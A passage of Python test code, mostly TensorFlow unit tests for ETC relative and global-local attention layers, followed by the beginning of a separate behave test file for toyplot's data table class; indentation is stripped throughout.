to_seq_len = 17
num_heads = 5
from_hidden_size = 11
to_hidden_size = 12
output_hidden_size = 13
total_key_size = 10
total_value_size = 15
relative_vocab_size = 21
from_seq = tf.random.normal([batch_size, from_seq_len, from_hidden_size])
to_seq = tf.random.normal([batch_size, to_seq_len, to_hidden_size])
att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, from_seq_len, to_seq_len]))
relative_att_ids = tf.random.uniform([batch_size, from_seq_len, to_seq_len],
maxval=relative_vocab_size,
dtype=tf.int32)
layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
result = layer(
from_seq=from_seq,
to_seq=to_seq,
att_mask=att_mask,
relative_att_ids=relative_att_ids)
self.assertAllEqual([batch_size, from_seq_len, output_hidden_size],
result.shape)
@parameterized.named_parameters(
('using_gather', False),
('using_one_hot', True),
)
def test_relative_attention_self_attention(self, use_one_hot_lookup):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
seq_len = 16
num_heads = 5
input_hidden_size = 11
output_hidden_size = 12
total_key_size = 10
total_value_size = 15
relative_vocab_size = 21
inputs = tf.constant(
np.random.normal(size=[batch_size, seq_len, input_hidden_size]),
tf.float32)
att_mask = tf.constant(
np.random.binomial(n=1, p=0.9, size=[batch_size, seq_len, seq_len]))
relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size, size=[batch_size, seq_len, seq_len]))
layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
result1 = layer(
inputs, att_mask=att_mask, relative_att_ids=relative_att_ids)
self.assertAllEqual([batch_size, seq_len, output_hidden_size],
result1.shape)
result2 = layer(
from_seq=inputs,
to_seq=inputs,
att_mask=att_mask,
relative_att_ids=relative_att_ids)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(result1, result2)
@parameterized.named_parameters(
('using_gather', False),
('using_one_hot', True),
)
def test_relative_attention_shared_sublayers(self, use_one_hot_lookup):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
from_seq_len = 16
to_seq_len = 17
num_heads = 5
from_hidden_size = 11
to_hidden_size = 12
output_hidden_size = 13
total_key_size = 10
total_value_size = 15
relative_vocab_size = 9
from_seq = tf.constant(
np.random.random(size=[batch_size, from_seq_len, from_hidden_size]))
to_seq = tf.constant(
np.random.random(size=[batch_size, to_seq_len, to_hidden_size]))
att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, from_seq_len, to_seq_len]))
layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
sharing_layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
query_projection=layer.query_projection,
key_projection=layer.key_projection,
value_projection=layer.value_projection,
qkv_relative_attention=layer.qkv_relative_attention,
output_projection=layer.output_projection)
different_layer = etc_layers.RelativeAttention(
hidden_size=output_hidden_size,
num_heads=num_heads,
total_key_size=total_key_size,
total_value_size=total_value_size,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
result1 = layer(
from_seq=from_seq,
to_seq=to_seq,
att_mask=att_mask,
relative_att_ids=None)
result2 = sharing_layer(
from_seq=from_seq,
to_seq=to_seq,
att_mask=att_mask,
relative_att_ids=None)
result3 = different_layer(
from_seq=from_seq,
to_seq=to_seq,
att_mask=att_mask,
relative_att_ids=None)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual(result1, result2)
self.assertNotAllClose(result1, result3)
def test_fused_global_local_attention_special_case_equivalence(self):
# To test for correctness, we make sure the output is equivalent to
# standard attention in the special case where `local_radius` covers the
# entire long sequence length and projection weights are shared.
# For simplicity, we don't use attention masks or relative attention ids
# in this test.
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
long_seq_len = 12
global_seq_len = 6
hidden_size = 10
num_heads = 5
local_radius = 15 # Must be >= `long_seq_len - 1` to remove sparsity.
# relative_vocab_size = 9
long_input = tf.constant(
np.random.normal(size=[batch_size, long_seq_len, hidden_size]))
global_input = tf.constant(
np.random.normal(size=[batch_size, global_seq_len, hidden_size]))
fused_att_layer = etc_layers.FusedGlobalLocalAttention(
long_hidden_size=hidden_size,
global_hidden_size=hidden_size,
num_heads=num_heads,
local_radius=local_radius,
share_qkv_projections=True,
share_att_output_projection=True)
long_output, global_output = fused_att_layer(
long_input,
global_input,
att_implementation='sparse')
# [batch_size, long_seq_len + global_seq_len, hidden_size]
fused_output = tf.concat([long_output, global_output], axis=1)
# Create concatenated input for standard attention.
# [batch_size, long_seq_len + global_seq_len, hidden_size]
concat_input = tf.concat([long_input, global_input], axis=1)
standard_att_layer = etc_layers.RelativeAttention(
hidden_size=hidden_size,
num_heads=num_heads,
query_projection=fused_att_layer.long_query_projection,
key_projection=fused_att_layer.l2l_key_projection,
value_projection=fused_att_layer.l2l_value_projection,
output_projection=fused_att_layer.long_output_projection)
expected_output = standard_att_layer(concat_input)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllClose(expected_output, fused_output)
# Make sure 'full' att_implementation gives the same output.
long_output_full_att, global_output_full_att = fused_att_layer(
long_input,
global_input,
att_implementation='full')
self.assertAllClose(long_output, long_output_full_att)
self.assertAllClose(global_output, global_output_full_att)
@parameterized.named_parameters(
dict(testcase_name='share_nothing'),
dict(testcase_name='share_kv_projections', share_kv_projections=True),
dict(testcase_name='share_qkv_projections', share_qkv_projections=True),
dict(
testcase_name='share_qkv_projections_supersedes_kv',
share_kv_projections=True,
share_qkv_projections=True),
dict(
testcase_name='share_att_output_projection',
share_att_output_projection=True),
dict(
testcase_name='share_everything',
share_qkv_projections=True,
share_att_output_projection=True),
)
def test_fused_global_local_attention_shared_sublayers(
self,
share_kv_projections=False,
share_qkv_projections=False,
share_att_output_projection=False):
hidden_size = 10
layer = etc_layers.FusedGlobalLocalAttention(
long_hidden_size=hidden_size,
global_hidden_size=hidden_size,
num_heads=5,
local_radius=7,
relative_vocab_size=9,
share_kv_projections=share_kv_projections,
share_qkv_projections=share_qkv_projections,
share_att_output_projection=share_att_output_projection)
# Run layer to make sure all variables are built.
layer(
long_input=tf.ones([1, 1, hidden_size]),
global_input=tf.ones([1, 1, hidden_size]))
if share_qkv_projections:
self.assertIs(layer.long_query_projection, layer.global_query_projection)
self.assert_all_identical(layer.l2l_key_projection,
layer.l2g_key_projection,
layer.g2g_key_projection,
layer.g2l_key_projection)
self.assert_all_identical(layer.l2l_value_projection,
layer.l2g_value_projection,
layer.g2g_value_projection,
layer.g2l_value_projection)
elif share_kv_projections:
self.assertIsNot(layer.long_query_projection,
layer.global_query_projection)
self.assertIs(layer.l2l_key_projection, layer.l2g_key_projection)
self.assertIs(layer.g2g_key_projection, layer.g2l_key_projection)
self.assertIsNot(layer.l2l_key_projection, layer.g2g_key_projection)
self.assertIs(layer.l2l_value_projection, layer.l2g_value_projection)
self.assertIs(layer.g2g_value_projection, layer.g2l_value_projection)
self.assertIsNot(layer.l2l_value_projection, layer.g2g_value_projection)
else:
self.assertIsNot(layer.long_query_projection,
layer.global_query_projection)
self.assertIsNot(layer.l2l_key_projection, layer.l2g_key_projection)
self.assertIsNot(layer.l2l_key_projection, layer.g2g_key_projection)
self.assertIsNot(layer.l2l_value_projection, layer.l2g_value_projection)
self.assertIsNot(layer.l2l_value_projection, layer.g2g_value_projection)
self.assertIsNot(layer.long_query_projection, layer.l2l_key_projection)
self.assertIsNot(layer.long_query_projection, layer.l2l_value_projection)
self.assertIsNot(layer.l2l_key_projection, layer.l2l_value_projection)
if share_att_output_projection:
self.assertIs(layer.long_output_projection,
layer.global_output_projection)
else:
self.assertIsNot(layer.long_output_projection,
layer.global_output_projection)
def test_fused_global_local_attention_custom_total_att_size(self):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
long_seq_len = 12
global_seq_len = 6
hidden_size = 11
num_heads = 5
local_radius = 2
total_att_size = 10
relative_vocab_size = 9
long_input = tf.constant(
np.random.normal(size=[batch_size, long_seq_len, hidden_size]))
global_input = tf.constant(
np.random.normal(size=[batch_size, global_seq_len, hidden_size]))
l2l_att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, long_seq_len, 2 * local_radius + 1]))
g2g_att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, global_seq_len, global_seq_len]))
l2g_att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, long_seq_len, global_seq_len]))
g2l_att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, global_seq_len, long_seq_len]))
l2l_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, long_seq_len, 2 * local_radius + 1]))
g2g_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, global_seq_len, global_seq_len]))
l2g_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, long_seq_len, global_seq_len]))
g2l_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, global_seq_len, long_seq_len]))
fused_att_layer = etc_layers.FusedGlobalLocalAttention(
long_hidden_size=hidden_size,
global_hidden_size=hidden_size,
num_heads=num_heads,
local_radius=local_radius,
long_total_att_size=total_att_size,
global_total_att_size=total_att_size,
relative_vocab_size=relative_vocab_size,
share_qkv_projections=True,
share_att_output_projection=True)
long_output, global_output = fused_att_layer(
long_input,
global_input,
l2l_att_mask=l2l_att_mask,
g2g_att_mask=g2g_att_mask,
l2g_att_mask=l2g_att_mask,
g2l_att_mask=g2l_att_mask,
l2l_relative_att_ids=l2l_relative_att_ids,
g2g_relative_att_ids=g2g_relative_att_ids,
l2g_relative_att_ids=l2g_relative_att_ids,
g2l_relative_att_ids=g2l_relative_att_ids)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllEqual([batch_size, long_seq_len, hidden_size],
long_output.shape)
self.assertAllEqual([batch_size, global_seq_len, hidden_size],
global_output.shape)
def test_attention_head_projection(self):
inputs = tf.ones([2, 3, 10])
layer = etc_layers.ProjectAttentionHeads(num_heads=4, size_per_head=5)
result = layer(inputs)
self.assertAllEqual([2, 3, 4, 5], result.shape)
inputs = tf.ones([2, 3, 4, 10])
layer = etc_layers.ProjectAttentionHeads(num_heads=5, size_per_head=6)
result = layer(inputs)
self.assertAllEqual([2, 3, 4, 5, 6], result.shape)
@parameterized.named_parameters(
('using_gather', False),
('using_one_hot', True),
)
def test_qkv_relative_attention(self, use_one_hot_lookup):
# batch_size: 2
# query_len: 3
# key_len: 4
# num_heads: 2
# key_size_per_head: 3
# value_size_per_head: 5
# relative_vocab_size: 6
# [batch_size, query_len, num_heads, key_size_per_head]
queries = tf.constant([
[
[[1.0, 0.0, 0.0], [1.0, 0.0, 0.0]],
[[0.0, 1.0, 0.0], [0.0, 1.0, 0.0]],
[[0.0, 0.0, 1.0], [0.0, 0.0, 1.0]],
], #
[
[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]],
[[1.0, 1.0, 0.0], [1.0, 1.0, 0.0]],
[[1.0, 0.0, 0.0], [1.0, 0.0, 0.0]],
]
])
# [batch_size, key_len, num_heads, key_size_per_head]
keys = tf.constant([
[
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[99.0, 0.0, 0.0], [-99.0, 0.0, 0.0]],
[[0.0, 0.0, 99.0], [0.0, 0.0, -99.0]],
[[0.0, 99.0, 0.0], [0.0, -99.0, 0.0]],
], #
[
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[99.0, 0.0, 0.0], [-99.0, 0.0, 0.0]],
[[0.0, 99.0, 0.0], [0.0, -99.0, 0.0]],
[[0.0, 0.0, 99.0], [0.0, 0.0, -99.0]],
]
])
# [batch_size, key_len, num_heads, value_size_per_head]
values = tf.constant([
[
[[0.1, 0.1, 0.1, 0.1, 0.1], [0.1, 0.1, 0.1, 0.1, -0.1]],
[[0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, -0.2]],
[[0.3, 0.3, 0.3, 0.3, 0.3], [0.3, 0.3, 0.3, 0.3, -0.3]],
[[0.4, 0.4, 0.4, 0.4, 0.4], [0.4, 0.4, 0.4, 0.4, -0.4]],
], #
[
[[-0.1, 0.1, 0.1, 0.1, 0.1], [-0.1, 0.1, 0.1, 0.1, -0.1]],
[[-0.2, 0.2, 0.2, 0.2, 0.2], [-0.2, 0.2, 0.2, 0.2, -0.2]],
[[-0.3, 0.3, 0.3, 0.3, 0.3], [-0.3, 0.3, 0.3, 0.3, -0.3]],
[[-0.4, 0.4, 0.4, 0.4, 0.4], [-0.4, 0.4, 0.4, 0.4, -0.4]],
]
])
# [batch_size, query_len, key_len]
att_mask = tf.constant([
[
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
],
[
[1, 0, 1, 1],
[1, 0, 1, 1],
[1, 0, 1, 1],
],
])
# [batch_size, query_len, key_len]
relative_att_ids = tf.constant([
[
[1, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 5],
],
[
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 2, 2],
],
])
# [relative_vocab_size, num_heads, key_size_per_head]
relative_emb_table = [
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0], [-99.0, 0.0, 0.0]],
[[-99.0, 0.0, 0.0], [99.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]],
[[0.0, 0.0, 0.0], [0.0, 0.0, -99.0]],
]
layer = etc_layers.QkvRelativeAttention(
relative_vocab_size=6,
use_one_hot_lookup=use_one_hot_lookup,
initializer=tf.initializers.constant(relative_emb_table))
result = layer(
queries=queries,
keys=keys,
values=values,
att_mask=att_mask,
relative_att_ids=relative_att_ids)
self.evaluate(tf.compat.v1.global_variables_initializer())
expected = [
[
[[0.2, 0.2, 0.2, 0.2, 0.2], [0.35, 0.35, 0.35, 0.35, -0.35]],
[[0.4, 0.4, 0.4, 0.4, 0.4], [0.2, 0.2, 0.2, 0.2, -0.2]],
[[0.3, 0.3, 0.3, 0.3, 0.3], [0.15, 0.15, 0.15, 0.15, -0.15]],
], #
[
[[-0.35, 0.35, 0.35, 0.35, 0.35], [-0.1, 0.1, 0.1, 0.1, -0.1]],
[[-0.3, 0.3, 0.3, 0.3, 0.3], [-0.25, 0.25, 0.25, 0.25, -0.25]],
[[-0.1, 0.1, 0.1, 0.1, 0.1], [-0.35, 0.35, 0.35, 0.35, -0.35]],
]
]
self.assertAllEqual([2, 3, 2, 5], result.shape)
self.assertAllClose(expected, result)
@parameterized.named_parameters(
dict(testcase_name='even_blocking_with_gather', local_radius=15),
dict(testcase_name='uneven_blocking_with_gather', local_radius=16),
dict(testcase_name='degenerate_blocking_with_gather', local_radius=35),
dict(
testcase_name='even_blocking_with_one_hot',
local_radius=15,
use_one_hot_lookup=True),
dict(
testcase_name='uneven_blocking_with_one_hot',
local_radius=16,
use_one_hot_lookup=True),
dict(
testcase_name='degenerate_blocking_with_one_hot',
local_radius=35,
use_one_hot_lookup=True),
dict(
testcase_name='even_blocking_with_gather_full_att',
local_radius=15,
att_implementation='full'),
dict(
testcase_name='uneven_blocking_with_gather_full_att',
local_radius=16,
att_implementation='full'),
dict(
testcase_name='degenerate_blocking_with_gather_full_att',
local_radius=35,
att_implementation='full'),
dict(
testcase_name='even_blocking_with_one_hot_full_att',
local_radius=15,
use_one_hot_lookup=True,
att_implementation='full'),
dict(
testcase_name='uneven_blocking_with_one_hot_full_att',
local_radius=16,
use_one_hot_lookup=True,
att_implementation='full'),
dict(
testcase_name='degenerate_blocking_with_one_hot_full_att',
local_radius=35,
use_one_hot_lookup=True,
att_implementation='full'),
)
def test_qkv_relative_local_attention(self,
local_radius,
use_one_hot_lookup=False,
att_implementation='sparse'):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 2
long_len = 64
side_len = 6
num_heads = 5
key_size_per_head = 2
value_size_per_head = 3
relative_vocab_size = 7
# Note: block_len = local_radius + 1
queries = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, key_size_per_head]),
tf.float32)
keys = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, key_size_per_head]),
tf.float32)
values = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, value_size_per_head]),
tf.float32)
att_mask = tf.constant(
np.random.binomial(
n=1, p=0.9, size=[batch_size, long_len, 2 * local_radius + 1]))
relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, long_len, 2 * local_radius + 1]))
side_keys = tf.constant(
np.random.normal(
size=[batch_size, side_len, num_heads, key_size_per_head]),
tf.float32)
side_values = tf.constant(
np.random.normal(
size=[batch_size, side_len, num_heads, value_size_per_head]),
tf.float32)
side_att_mask = tf.constant(
np.random.binomial(n=1, p=0.9, size=[batch_size, long_len, side_len]))
side_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size, size=[batch_size, long_len, side_len]))
layer = etc_layers.QkvRelativeLocalAttention(
local_radius=local_radius,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
result1 = layer(
queries,
keys,
values,
att_mask=att_mask,
relative_att_ids=relative_att_ids,
side_keys=side_keys,
side_values=side_values,
side_att_mask=side_att_mask,
side_relative_att_ids=side_relative_att_ids,
att_implementation=att_implementation)
self.assertAllEqual([batch_size, long_len, num_heads, value_size_per_head],
result1.shape)
result2 = layer(
queries,
keys,
values,
att_mask=None,
relative_att_ids=None,
side_keys=side_keys,
side_values=side_values,
side_att_mask=None,
side_relative_att_ids=None,
att_implementation=att_implementation)
self.assertAllEqual([batch_size, long_len, num_heads, value_size_per_head],
result2.shape)
result3 = layer(
queries,
keys,
values,
att_mask=att_mask,
relative_att_ids=relative_att_ids,
side_keys=None,
side_values=None,
side_att_mask=None,
side_relative_att_ids=None,
att_implementation=att_implementation)
self.assertAllEqual([batch_size, long_len, num_heads, value_size_per_head],
result3.shape)
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertNotAllClose(result1, result2)
self.assertNotAllClose(result2, result3)
self.assertNotAllClose(result1, result3)
@parameterized.named_parameters(
('even_blocking_with_gather', 15, False),
('uneven_blocking_with_gather', 16, False),
('degenerate_blocking_with_gather', 35, False),
('even_blocking_with_one_hot', 15, True),
('uneven_blocking_with_one_hot', 16, True),
('degenerate_blocking_with_one_hot', 35, True),
)
def test_qkv_relative_local_attention_full_att_implementation(
self, local_radius, use_one_hot_lookup):
# We check the validity of the `att_implementation` option
# by confirming both internal implementations return the same output.
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
long_len = 64
side_len = 6
num_heads = 5
key_size_per_head = 2
value_size_per_head = 3
relative_vocab_size = 7
# Note: block_len = local_radius + 1
queries = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, key_size_per_head]),
tf.float32)
keys = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, key_size_per_head]),
tf.float32)
values = tf.constant(
np.random.normal(
size=[batch_size, long_len, num_heads, value_size_per_head]),
tf.float32)
att_mask = tf.constant(
np.random.binomial(
n=1, p=0.8, size=[batch_size, long_len, 2 * local_radius + 1]),
dtype=tf.int32)
relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size,
size=[batch_size, long_len, 2 * local_radius + 1]),
dtype=tf.int32)
side_keys = tf.constant(
np.random.normal(
size=[batch_size, side_len, num_heads, key_size_per_head]),
tf.float32)
side_values = tf.constant(
np.random.normal(
size=[batch_size, side_len, num_heads, value_size_per_head]),
tf.float32)
side_att_mask = tf.constant(
np.random.binomial(n=1, p=0.8, size=[batch_size, long_len, side_len]),
dtype=tf.int32)
side_relative_att_ids = tf.constant(
np.random.randint(
relative_vocab_size, size=[batch_size, long_len, side_len]),
dtype=tf.int32)
layer = etc_layers.QkvRelativeLocalAttention(
local_radius=local_radius,
relative_vocab_size=relative_vocab_size,
use_one_hot_lookup=use_one_hot_lookup)
sparse_implementation_result = layer(
queries,
keys,
values,
att_mask=att_mask,
relative_att_ids=relative_att_ids,
side_keys=side_keys,
side_values=side_values,
side_att_mask=side_att_mask,
side_relative_att_ids=side_relative_att_ids,
att_implementation='sparse')
full_implementation_result = layer(
queries,
keys,
values,
att_mask=att_mask,
relative_att_ids=relative_att_ids,
side_keys=side_keys,
side_values=side_values,
side_att_mask=side_att_mask,
side_relative_att_ids=side_relative_att_ids,
att_implementation='full')
self.evaluate(tf.compat.v1.global_variables_initializer())
self.assertAllClose(sparse_implementation_result,
full_implementation_result)
class HelpersTest(tf.test.TestCase):
def test_expand_local_ids_to_blocks_with_even_blocking(self):
# batch_size = 2
# seq_len = 6
# local_radius = 1
# block_len = 2
# [batch_size, seq_len, 2*local_radius + 1]
local_ids = tf.constant([
[
[1, 2, 3], #
[4, 5, 6], #
[7, 8, 9], #
[10, 11, 12], #
[13, 14, 15], #
[16, 17, 18], #
], #
[
[-1, -2, -3], #
[-4, -5, -6], #
[-7, -8, -9], #
[-10, -11, -12], #
[-13, -14, -15], #
[-16, -17, -18], #
], #
])
self.assertAllEqual(
[
[
[
[0, 1, 2, 3, 0, 0], #
[0, 0, 4, 5, 6, 0], #
], #
[
[0, 7, 8, 9, 0, 0], #
[0, 0, 10, 11, 12, 0], #
], #
[
[0, 13, 14, 15, 0, 0], #
[0, 0, 16, 17, 18, 0], #
]
], #
[
[
[0, -1, -2, -3, 0, 0], #
[0, 0, -4, -5, -6, 0], #
], #
[
[0, -7, -8, -9, 0, 0], #
[0, 0, -10, -11, -12, 0], #
], #
[
[0, -13, -14, -15, 0, 0], #
[0, 0, -16, -17, -18, 0], #
]
], #
],
attention._expand_local_ids_to_blocks(
local_ids, mask_padding_ids=False))
self.assertAllEqual(
[
[
[
[0, 0, 2, 3, 0, 0], #
[0, 0, 4, 5, 6, 0], #
], #
[
[0, 7, 8, 9, 0, 0], #
[0, 0, 10, 11, 12, 0], #
], #
[
[0, 13, 14, 15, 0, 0], #
[0, 0, 16, 17, 0, 0], #
]
], #
[
[
[0, 0, -2, -3, 0, 0], #
[0, 0, -4, -5, -6, 0], #
], #
[
[0, -7, -8, -9, 0, 0], #
[0, 0, -10, -11, -12, 0], #
], #
[
[0, -13, -14, -15, 0, 0], #
[0, 0, -16, -17, 0, 0], #
]
], #
],
attention._expand_local_ids_to_blocks(local_ids))
def test_expand_local_ids_to_blocks_with_uneven_blocking(self):
# batch_size = 2
# seq_len = 5
# local_radius = 2
# block_len = 3
# [batch_size, seq_len, 2*local_radius + 1]
local_ids = tf.constant([
[
[1, 2, 3, 4, 5], #
[6, 7, 8, 9, 10], #
[11, 12, 13, 14, 15], #
[16, 17, 18, 19, 20], #
[21, 22, 23, 24, 25], #
], #
[
[-1, -2, -3, -4, -5], #
[-6, -7, -8, -9, -10], #
[-11, -12, -13, -14, -15], #
[-16, -17, -18, -19, -20], #
[-21, -22, -23, -24, -25], #
], #
])
self.assertAllEqual(
[
[
[
[0, 1, 2, 3, 4, 5, 0, 0, 0], #
[0, 0, 6, 7, 8, 9, 10, 0, 0], #
[0, 0, 0, 11, 12, 13, 14, 15, 0], #
], #
[
[0, 16, 17, 18, 19, 20, 0, 0, 0], #
[0, 0, 21, 22, 23, 24, 25, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
]
], #
[
[
[0, -1, -2, -3, -4, -5, 0, 0, 0], #
[0, 0, -6, -7, -8, -9, -10, 0, 0], #
[0, 0, 0, -11, -12, -13, -14, -15, 0], #
], #
[
[0, -16, -17, -18, -19, -20, 0, 0, 0], #
[0, 0, -21, -22, -23, -24, -25, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
]
], #
],
attention._expand_local_ids_to_blocks(
local_ids, mask_padding_ids=False))
self.assertAllEqual(
[
[
[
[0, 0, 0, 3, 4, 5, 0, 0, 0], #
[0, 0, 0, 7, 8, 9, 10, 0, 0], #
[0, 0, 0, 11, 12, 13, 14, 15, 0], #
], #
[
[0, 16, 17, 18, 19, 0, 0, 0, 0], #
[0, 0, 21, 22, 23, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
]
], #
[
[
[0, 0, 0, -3, -4, -5, 0, 0, 0], #
[0, 0, 0, -7, -8, -9, -10, 0, 0], #
[0, 0, 0, -11, -12, -13, -14, -15, 0], #
], #
[
[0, -16, -17, -18, -19, 0, 0, 0, 0], #
[0, 0, -21, -22, -23, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
]
], #
],
attention._expand_local_ids_to_blocks(local_ids))
def test_expand_local_ids_to_blocks_with_uneven_blocking_ones_mask(self):
# batch_size = 1
# seq_len = 7
# local_radius = 2
# block_len = 3
# [batch_size, seq_len, 2*local_radius + 1]
local_ids = tf.constant([
[
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
[1, 1, 1, 1, 1], #
], #
])
self.assertAllEqual(
[
[
[
[0, 1, 1, 1, 1, 1, 0, 0, 0], #
[0, 0, 1, 1, 1, 1, 1, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 1, 0], #
], #
[
[0, 1, 1, 1, 1, 1, 0, 0, 0], #
[0, 0, 1, 1, 1, 1, 1, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 1, 0], #
], #
[
[0, 1, 1, 1, 1, 1, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
], #
], #
],
attention._expand_local_ids_to_blocks(
local_ids, mask_padding_ids=False))
self.assertAllEqual(
[
[
[
[0, 0, 0, 1, 1, 1, 0, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 1, 0], #
], #
[
[0, 1, 1, 1, 1, 1, 0, 0, 0], #
[0, 0, 1, 1, 1, 1, 1, 0, 0], #
[0, 0, 0, 1, 1, 1, 1, 0, 0], #
], #
[
[0, 1, 1, 1, 0, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
], #
], #
],
attention._expand_local_ids_to_blocks(local_ids))
def test_expand_local_ids_to_blocks_with_degenerate_blocking(self):
# batch_size = 2
# seq_len = 2
# local_radius = 2
# block_len = 3
# [batch_size, seq_len, 2*local_radius + 1]
local_ids = tf.constant([
[
[1, 2, 3, 4, 5], #
[6, 7, 8, 9, 10], #
], #
[
[-1, -2, -3, -4, -5], #
[-6, -7, -8, -9, -10], #
], #
])
self.assertAllEqual(
[
[ #
[
[0, 1, 2, 3, 4, 5, 0, 0, 0], #
[0, 0, 6, 7, 8, 9, 10, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
] #
], #
[ #
[
[0, -1, -2, -3, -4, -5, 0, 0, 0], #
[0, 0, -6, -7, -8, -9, -10, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
] #
], #
],
attention._expand_local_ids_to_blocks(
local_ids, mask_padding_ids=False))
self.assertAllEqual(
[
[ #
[
[0, 0, 0, 3, 4, 0, 0, 0, 0], #
[0, 0, 0, 7, 8, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
] #
], #
[ #
[
[0, 0, 0, -3, -4, 0, 0, 0, 0], #
[0, 0, 0, -7, -8, 0, 0, 0, 0], #
[0, 0, 0, 0, 0, 0, 0, 0, 0], #
] #
], #
],
attention._expand_local_ids_to_blocks(local_ids))
if __name__ == '__main__':
tf.test.main()
|
features/steps/data-table.py | eaton-lab/toyplot | 438 | 12716629 | <filename>features/steps/data-table.py
# Copyright 2014, Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains certain
# rights in this software.
from behave import *
import nose.tools
import numpy.testing
import collections
import io
import numpy
import os
import sys
import tempfile
import toyplot.data
import testing
try:
import pandas
except:
pass
def pandas_available(context):
if "pandas" in sys.modules:
return True
context.scenario.skip(reason="The pandas library is not available.")
return False
root_dir = os.path.dirname(os.path.dirname(__file__))
@given(u'a new toyplot.data.table')
def step_impl(context):
context.data = toyplot.data.Table()
@then(u'the table should be empty')
def step_impl(context):
nose.tools.assert_equal(len(context.data), 0)
nose.tools.assert_equal(context.data.shape, (0, 0))
nose.tools.assert_equal(list(context.data.items()), [])
nose.tools.assert_equal(list(context.data.keys()), [])
nose.tools.assert_equal(list(context.data.values()), [])
@then(u'adding columns should change the table')
def step_impl(context):
context.data["a"] = numpy.arange(10)
nose.tools.assert_equal(list(context.data.keys()), ["a"])
nose.tools.assert_equal(context.data.shape, (10, 1))
context.data["b"] = context.data["a"] ** 2
nose.tools.assert_equal(list(context.data.keys()), ["a", "b"])
nose.tools.assert_equal(context.data.shape, (10, 2))
context.data["c"] = numpy.zeros(10)
nose.tools.assert_equal(list(context.data.keys()), ["a", "b", "c"])
